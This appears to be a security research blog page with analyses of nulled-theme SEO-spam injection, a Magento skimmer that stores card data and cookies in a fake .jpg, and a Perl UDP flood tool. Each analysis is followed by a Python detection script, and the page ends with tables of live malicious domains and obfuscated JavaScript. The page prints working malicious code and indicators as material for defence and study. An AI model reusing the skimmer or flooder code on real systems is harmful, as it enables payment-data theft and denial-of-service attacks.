
Sucuri Research Labs

The home of our Security Operations Group, including our Malware Research and Incident Response teams.

We at Sucuri always stress the risks of using themes, plugins or any other add-on downloaded from unofficial sources ("nulled" versions). During an investigation we found, inside a theme, malicious code that promotes an external website and possibly generates revenue for the "developer" without the site owner's consent. The downloaded package contained many files named index.php and default.php spread across different folders. Those files contained the following base64-encoded code:

 <?php $wfk='PGRpdiBzdHlsZT0icG9zaXRpb246YWJzb2x1dGU7dG9wOjA7bGVmdDotOTk5OXB4OyI+CjxhIGhyZWY9Imh0dHA6Ly9qb29tbGE0ZXZlci5ydS9ib3d0aGVtZXMvMjI4Ny1idC1waG90b2dyYXBoeS5odG1sIiB0aXRsZT0iQlQgUGhvdG9ncmFwaHkgLSDRiNCw0LHQu9C+0L0gam9vbWxhIiB0YXJnZXQ9Il9ibGFuayI+QlQgUGhvdG9ncmFwaHkgLSDRiNCw0LHQu9C+0L0gam9vbWxhPC9hPgo8YSBocmVmPSJodHRwOi8vYWxsLWJvb2submV0LyIgdGl0bGU9ItCa0L3QuNCz0LgiIHRhcmdldD0iX2JsYW5rIj7QmtC90LjQs9C4PC9hPgo8L2Rpdj4='; echo base64_decode($wfk); ?>

Decoding it into a human-readable format, we got these “invisible” malicious links:

<div style="position:absolute;top:0;left:-9999px;">
<a href="hxxp://joomla4ever .ru/bowthemes/2287-bt-photography.html" title="BT Photography - шаблон joomla" target="_blank">BT Photography - шаблон joomla</a>
<a href="hxxp://all-book .net/" title="Книги" target="_blank">Книги</a>
</div>

This kind of infection is commonly injected into nulled components for different CMSs. It is designed to damage the SEO positioning of the victim site through the arbitrary links, while promoting a particular website with the intent of generating revenue for the "developers".

To reduce the risks, we always recommend downloading any add-on (themes, plugins, extensions) for your site directly from the official source because you never know which extra “feature” you are getting from those “alternative” versions.

You may find more information related to this infection here, here and here.
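One way to find this pattern in a theme or plugin before deploying it is to decode every base64 literal that is handed to base64_decode() and check whether the decoded markup hides links off-screen. The following scanner is an added example written for this article, not Sucuri's code; the sample PHP file it checks is constructed here with example.com links rather than the real domains from the investigation, and the regexes are assumptions about how such loaders are usually written (a literal passed directly to base64_decode(), or assigned to a variable that is decoded later).

```python
import base64
import re
from pathlib import Path

# Constructed sample of the pattern found in the nulled theme: a base64 literal
# assigned to a variable and echoed through base64_decode(). The payload is
# built here for the example with example.com links, not the real domains.
SAMPLE_PHP = (
    "<?php $wfk='"
    + base64.b64encode(
        b'<div style="position:absolute;top:0;left:-9999px;">\n'
        b'<a href="http://spam.example.com/theme.html" title="Example">Example</a>\n'
        b"</div>"
    ).decode()
    + "'; echo base64_decode($wfk); ?>"
)

# Constructed benign counterpart: the decoded markup is visible, so it must not be flagged.
VISIBLE_PHP = (
    "<?php echo base64_decode('"
    + base64.b64encode(b"<p>visible text here</p>").decode()
    + "'); ?>"
)

# A base64 literal passed straight to base64_decode(...).
B64_CALL = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]{20,})['\"]\s*\)")
# A base64 literal assigned to a variable (checked below for a later base64_decode($var)).
B64_ASSIGN = re.compile(r"\$(\w+)\s*=\s*['\"]([A-Za-z0-9+/=]{40,})['\"]")
# CSS that pushes content off-screen or hides it, as the decoded <div> above does.
HIDDEN_CSS = re.compile(
    r"(?:left|top|text-indent)\s*:\s*-\d{3,}px|display\s*:\s*none|visibility\s*:\s*hidden",
    re.I,
)
ANCHOR_HREF = re.compile(r"<a\s[^>]*href=['\"]([^'\"]+)['\"]", re.I)


def decode_blobs(php_source: str) -> list[str]:
    """Return the decoded text of every base64 literal that reaches base64_decode()."""
    blobs = [m.group(1) for m in B64_CALL.finditer(php_source)]
    for m in B64_ASSIGN.finditer(php_source):
        var, blob = m.groups()
        if re.search(r"base64_decode\(\s*\$" + re.escape(var) + r"\s*\)", php_source):
            blobs.append(blob)
    decoded = []
    for blob in blobs:
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except ValueError:  # not valid base64 after all: skip it
            continue
    return decoded


def find_hidden_links(php_source: str) -> list[str]:
    """Return the href of every link that a decoded blob places inside hidden markup."""
    hits = []
    for text in decode_blobs(php_source):
        if HIDDEN_CSS.search(text):
            hits.extend(ANCHOR_HREF.findall(text))
    return hits


def scan_tree(root: str) -> dict[str, list[str]]:
    """Map each .php file under root that emits hidden links to the links it emits."""
    findings = {}
    for path in Path(root).rglob("*.php"):
        links = find_hidden_links(path.read_text(errors="replace"))
        if links:
            findings[str(path)] = links
    return findings


if __name__ == "__main__":
    import sys

    if len(sys.argv) > 1:
        for file, links in scan_tree(sys.argv[1]).items():
            print(file, links)
    else:
        print(find_hidden_links(SAMPLE_PHP))
```

Run it with the unpacked theme directory as the only argument; every file it lists should be reviewed, and a theme that ships any such file should not be installed. Attackers also obfuscate in other ways (str_rot13, gzinflate, chained decoders), so an empty result is not proof of a clean package.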

SEO spam is very common for a reason: money. Spammers are paid to promote websites on Google. We deal with lots of SEO spam cases daily. The most common cases are database infections, theme file infections and random spammy HTML pages. However, a few days ago we found an interesting variation: a whole CMS specially configured and used to load spam on a website.


An infected site is useful to cyber-criminals only until it gets blacklisted. Traffic drops significantly once a URL is on Google's Safe Browsing list, and if the hacked site is used to send email spam, the success of the campaign depends directly on the server being absent from anti-spam blacklists. That is why it matters to attackers whether the sites they have compromised are blacklisted or not.

Here’s an example of malware that works with Google’s and Spamhaus’s blacklists.


We often see malicious code being used to steal credit card details and other sensitive information from compromised Magento sites, but this one caught our eye because of how the information was collected and stored.

Usually the attacker sends the stolen data out via e-mail, but in this case a text file with a "jpg" extension is created to store it:

// Triggers only on admin/checkout requests: the literal decodes to "admin|payment|order|saveOrder|onepage|checkout".
if(preg_match("/".base64_decode('YWRtaW58cGF5bWVudHxvcmRlcnxzYXZlT3JkZXJ8b25lcGFnZXxjaGVja291dA==')."/i", $_SERVER["REQUEST_URI"])){ 
// Appends base64(serialize($_POST)."--".serialize($_COOKIE)) to a .jpg file under the store's media/catalog/product/ directory.
if(!empty($_POST))@file_put_contents(base64_decode('L2Nocm9vdC9ob21lL2RhaWx5Z3JhL2RhaWx5Z3JhYnMuY29tL2h0bWwvbWVkaWEvY2F0YWxvZy9wcm9kdWN0LzIvMS8yMV8xLmpwZw=='), base64_encode( @serialize($_POST)."--".@seralize($_COOKIE) )."\n", FILE_APPEND);
}
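Because the drop file carries an image extension but is really a text file of base64 lines, the fastest way to confirm an infection and measure its scope is to check every .jpg under the media directory for a missing JPEG header and for lines that decode to serialized PHP arrays. The script below is an added example written for this write-up, not Sucuri's tooling. It assumes the record format shown in the snippet above (base64 of serialize($_POST) . "--" . serialize($_COOKIE), one per line); the php_serialize_strings() helper and the sample drop file are constructed here for the test and use placeholder values.

```python
import base64
import re
from pathlib import Path

JPEG_MAGIC = b"\xff\xd8\xff"
# PHP serialize() renders an array as a:<count>:{...}; the skimmer stores
# base64(serialize($_POST) . "--" . serialize($_COOKIE)), one record per line.
SERIALIZED_ARRAY = re.compile(rb"^a:\d+:\{")
B64_LINE = re.compile(rb"^[A-Za-z0-9+/]+={0,2}$")
# Source-level indicator (assumed shape, derived from the snippet above): file_put_contents()
# of a base64-decoded path, appending serialized or base64-encoded request data.
SKIMMER_SOURCE = re.compile(
    r"file_put_contents\(\s*base64_decode\([^)]*\)\s*,.*?(serialize|base64_encode).*?FILE_APPEND",
    re.S,
)


def php_serialize_strings(d: dict[str, str]) -> bytes:
    """Minimal stand-in for PHP serialize() on a flat array of strings (constructed helper)."""
    out = b"a:%d:{" % len(d)
    for k, v in d.items():
        kb, vb = k.encode(), v.encode()
        out += b's:%d:"%s";s:%d:"%s";' % (len(kb), kb, len(vb), vb)
    return out + b"}"


def skimmer_record(post: dict[str, str], cookie: dict[str, str]) -> bytes:
    """One line as the skimmer would write it (constructed, mirrors the snippet above)."""
    return base64.b64encode(php_serialize_strings(post) + b"--" + php_serialize_strings(cookie)) + b"\n"


# Constructed drop file: two captured checkout requests with placeholder values.
SAMPLE_DROP = skimmer_record(
    {"payment[cc_owner]": "Jane Doe", "payment[cc_number]": "0000000000000000"},
    {"frontend": "placeholder-session-id"},
) + skimmer_record({"login[username]": "jane@example.com"}, {"frontend": "placeholder-session-id"})


def captured_records(data: bytes) -> list[bytes]:
    """Decoded skimmer records found in data, in file order (one per captured request)."""
    records = []
    for line in data.splitlines():
        line = line.strip()
        if len(line) < 16 or not B64_LINE.match(line):
            continue
        try:
            decoded = base64.b64decode(line, validate=True)
        except ValueError:
            continue
        if SERIALIZED_ARRAY.match(decoded):
            records.append(decoded)
    return records


def is_fake_image(data: bytes) -> bool:
    """True when an 'image' lacks the JPEG magic and holds at least one skimmer record."""
    return not data.startswith(JPEG_MAGIC) and bool(captured_records(data))


def looks_like_skimmer(php_source: str) -> bool:
    """True when PHP source contains the append-to-decoded-path pattern of the snippet."""
    return SKIMMER_SOURCE.search(php_source) is not None


def scan_media(root: str) -> dict[str, int]:
    """Map each *.jpg/*.jpeg under root that is really a drop file to its record count."""
    findings = {}
    for path in Path(root).rglob("*"):
        if path.suffix.lower() in (".jpg", ".jpeg") and path.is_file():
            data = path.read_bytes()
            if is_fake_image(data):
                findings[str(path)] = len(captured_records(data))
    return findings


if __name__ == "__main__":
    import sys

    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for file, count in scan_media(root).items():
        print(f"{file}: {count} captured request(s)")
```

The record count is what incident response needs first: it tells you how many checkout or login requests were captured between the injection and the cleanup, which drives customer notification. Removing the drop file alone is not a fix; the PHP that writes it (the pattern looks_like_skimmer() matches) has to be found and removed as well, and the media directory should not be executable by the web server.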

After a website is compromised, it can be misused in multiple ways. We often see it being used in SEO spam campaigns or to distribute drive-by downloads. However, last week we found an interesting DDoS (Denial of Service) tool on one of our clients' websites that I would like to share.

The code was added to /var/tmp and was called by an external PHP script, allowing a remote attacker to start a DDoS against chosen targets. This is a snippet of the malicious code:

if ($ARGV[1] ==0 && $ARGV[2] ==0) {
goto randpakets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &"); 
goto randpackets;
}
packets:
for (;;) {
$size=$rand x $rand x $rand;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}
randpackets:
for (;;) {
$size=$rand x $rand x $rand;
$port=(rand 65000) +1;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

The malware takes $ip, $port and $time as arguments to launch the attack:

$ARGC=@ARGV;
my ($ip,$port,$size,$time);
$ip=$ARGV[0];
$port=$ARGV[0];
$time=$ARGV[0];
socket(crazy, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$ip");
 

Once those values are supplied, the script sends as many UDP packets as it can in an attempt to flood the victim's network. A side effect is that the compromised server itself can be overloaded (CPU and memory consumption) and can exceed its bandwidth limits.

If your site is currently experiencing high usage of server resources or unexpected behavior, it could be an indication of a compromise. It’s equally important to be on the lookout for such issues.

You can always count on CloudProxy, our website firewall, to help you protect your site against this and many other attacks.
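Two things in the write-up above are cheap to check from the host itself: an interpreter running a script out of a world-writable temporary directory (/var/tmp here), and the `(sleep $time; killall -9 udp) &` timer the tool spawns to stop itself. The following script is an added example written for this article, not Sucuri's code; it parses `ps -eo pid,user,args --no-headers` output and flags both indicators. The sample ps output is constructed (the target address is from the TEST-NET range), and the interpreter and temp-directory lists are assumptions you may need to extend for your platform.

```python
import re
import shlex

# Constructed sample of `ps -eo pid,user,args --no-headers` output on a web host.
# The perl line mirrors the flooder described above (script in /var/tmp, given an
# IP, port and duration); the address is from the TEST-NET range.
SAMPLE_PS = """\
  812 root     /usr/sbin/sshd -D
 1940 www-data php-fpm: pool www
 2207 www-data perl /var/tmp/udp 198.51.100.7 0 600
 2210 www-data /bin/sh -c (sleep 600;killall -9 udp) &
 2301 mysql    /usr/sbin/mysqld
 2410 www-data /usr/bin/python3 /opt/app/worker.py
"""

INTERPRETERS = {"perl", "php", "python", "python2", "python3", "sh", "bash", "dash", "ruby"}
# World-writable locations a web user can drop a script into (assumed list).
TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
# The `(sleep N; killall -9 NAME) &` timer the flooder spawns to stop itself.
KILL_TIMER = re.compile(r"sleep\s+\d+\s*;\s*killall\s+-9\s+\S+")


def parse_ps(text: str) -> list[tuple[int, str, str]]:
    """Split ps output into (pid, user, args) rows, skipping any header line."""
    rows = []
    for line in text.splitlines():
        parts = line.split(None, 2)
        if len(parts) == 3 and parts[0].isdigit():
            rows.append((int(parts[0]), parts[1], parts[2]))
    return rows


def script_from_temp(args: str):
    """Path of the script when an interpreter runs one from a temp directory, else None."""
    try:
        argv = shlex.split(args)
    except ValueError:  # unbalanced quotes in the command line
        argv = args.split()
    if not argv or argv[0].rsplit("/", 1)[-1] not in INTERPRETERS:
        return None
    for arg in argv[1:]:
        if arg.startswith("-"):  # interpreter option such as -w or -e
            continue
        return arg if arg.startswith(TEMP_DIRS) else None  # first operand is the script
    return None


def suspicious_processes(ps_text: str) -> list[tuple[int, str, str]]:
    """(pid, user, reason) for every process matching one of the two indicators."""
    hits = []
    for pid, user, args in parse_ps(ps_text):
        script = script_from_temp(args)
        if script:
            hits.append((pid, user, "interpreter running " + script))
        elif KILL_TIMER.search(args):
            hits.append((pid, user, "timed killall, as spawned by the flooder"))
    return hits


if __name__ == "__main__":
    import subprocess
    import sys

    if len(sys.argv) > 1 and sys.argv[1] == "--live":
        ps_text = subprocess.run(
            ["ps", "-eo", "pid,user,args", "--no-headers"], capture_output=True, text=True
        ).stdout
    else:
        ps_text = SAMPLE_PS
    for pid, user, reason in suspicious_processes(ps_text):
        print(f"pid {pid} ({user}): {reason}")
```

A hit on the first indicator is worth a look even outside a DDoS investigation, since web shells and droppers also run from /tmp and /var/tmp; mounting those directories noexec and denying the web server user outbound UDP except to DNS resolvers removes most of the tool's usefulness without touching the application.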

Latest malware entries

Hidden iframes

Latest hidden iframes our scanner has identified on compromised websites.

# of sites infected  Type    Malware / Domains
20                   iframe  http://businessriver.top/?aff=333009
9                    iframe  http://nmityiwr.hopto.org/wordpress/?ARX8
9                    iframe  http://nlbbudm.hopto.org/wordpress/?ARX8
8                    iframe  http://xdstnhz.ddnsking.com/wordpress/?ARX8
5                    iframe  http://lajliivg.ddnsking.com/wordpress/?ARX8
5                    iframe  http://ioqlswt.hopto.org/wordpress/?ARX8
5                    iframe  http://hvixybvnrd.ddnsking.com/wordpress/?ARX8
4                    iframe  http://dgrmwa.ddnsking.com/wordpress/?ARX8
3                    iframe  http://thyecvxqrm.ddnsking.com/wordpress/?ARX8
3                    iframe  http://pltuyjini.hopto.org/wordpress/?ARX8
3                    iframe  http://bs.israelinfo.ru/adframe.php?n=goo110113
2                    iframe  http://art-blesk.com/ru/news/
1                    iframe  http://emhgdsbb.ddnsking.com/wordpress/?ARX8
Limited view... Only the top entries being displayed.

Conditional redirections

Conditional redirections we have detected (based on user agents or referers).

# of sites infected  Type          Malware / Domains
16                   redirections  http://go60.ru
10                   redirections  http://web-redirect.ru/?web
6                    redirections  http://traf-extractor.ru
6                    redirections  http://ph21us.ru/
6                    redirections  http://liuliang.ok365.com/
5                    redirections  http://unjytzaq.ru/count28.php
4                    redirections  http://default7.com
3                    redirections  http://crossdirect.ru
2                    redirections  http://royalmai.com/?folio=9PO6Z3MVF
2                    redirections  http://qertea.instanthq.com/
1                    redirections  http://www.internoc24.com/
1                    redirections  http://www.hdpornsitesi.in/
1                    redirections  http://www.goodsellmall.com
1                    redirections  http://www.gadgetsforall.net/EGoiTC4rWL.php?s=24
1                    redirections  http://www.alloverdating.com/7dJcsNqD6P.php?s=24
1                    redirections  http://ww1.threup.com/?folio=9POGF6H4I
1                    redirections  http://ww1.siatrik.com/?folio=9POGF6H4I
1                    redirections  http://ww1.mp3hog.net/?folio=9POGF6H4I
1                    redirections  http://ww1.mp3cat.org/?folio=9POGF6H4I
1                    redirections  http://ww1.growthgreenes.net/?folio=9POGF6H4I
Limited view... Only the top entries being displayed.

Spammers

Latest spammers we have detected sending comment, forum or SEO spam.

# of sites infected  Type     Malware / Domains
20                   spammer  http://123livesex.com/,forumspam,2014-01
20                   spammer  http://20min.ch,forumspam,2014-01
20                   spammer  http://90210daily.com/,forumspam,2014-01
20                   spammer  http://EzAdBlaster.com,forumspam,2014-01
20                   spammer  http://absolutefringe.com,forumspam,2014-01
20                   spammer  http://adaptfunrun.org/,forumspam,2014-01
20                   spammer  http://andresmarcossanchez.com/MichaelKors/,forumspam,2014-01
20                   spammer  http://appliancelandinc.com/,forumspam,2014-01
20                   spammer  http://audiobookkeeper.ru/,forumspam,2014-01
20                   spammer  http://australiainternetsearch.com/,forumspam,2014-01
20                   spammer  http://autism.sedl.org/index.php/about-us,forumspam,2014-01
20                   spammer  http://axanaxplease.com/,forumspam,2014-01
20                   spammer  http://ayurvedatradicional.com/wordpress/,forumspam,2014-01
20                   spammer  http://azezhomeloans.com/body.html,forumspam,2014-01
20                   spammer  http://baltimorecomiccon.com/sponsors/,forumspam,2014-01
20                   spammer  http://bashkiaprrenjas.com/,forumspam,2014-01
20                   spammer  http://bellezzaamica.it/Moncler-Sale-With-Free-Shipping.html,forumspam,2014-01
20                   spammer  http://birdsofstkittsnevis.com/files/,forumspam,2014-01
20                   spammer  http://bmaphoenix.org/young-professionals/,forumspam,2014-01
20                   spammer  http://bradblaze.com.au/,forumspam,2014-01
Limited view... Only the top entries being displayed.

Encoded javascript

Encoded JavaScript that redirects to Blackhole and other exploit kits, or that builds a remote call.

# of sites infected  Type        Malware / Domains
11                   javascript  http://mobi-avto.ru/cnt2.gif": var a9c6711=[478,538,578,583,596,510,593,594,599,586,579,539,512...
2                    javascript  http://rencontres.itemsz.com/main.php": document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61...
158                  javascript  <script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
128                  javascript  <script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
97                   javascript  <script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
78                   javascript  <script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
75                   javascript  <script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
68                   javascript  <script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
59                   javascript  <script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
51                   javascript  <script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
49                   javascript  <script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
48                   javascript  <script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
48                   javascript  <script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
47                   javascript  <script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
45                   javascript  <script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
40                   javascript  <script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
38                   javascript  <script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
36                   javascript  <script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
36                   javascript  <script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
35                   javascript  <script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.ho...
Limited view... Only the top entries being displayed.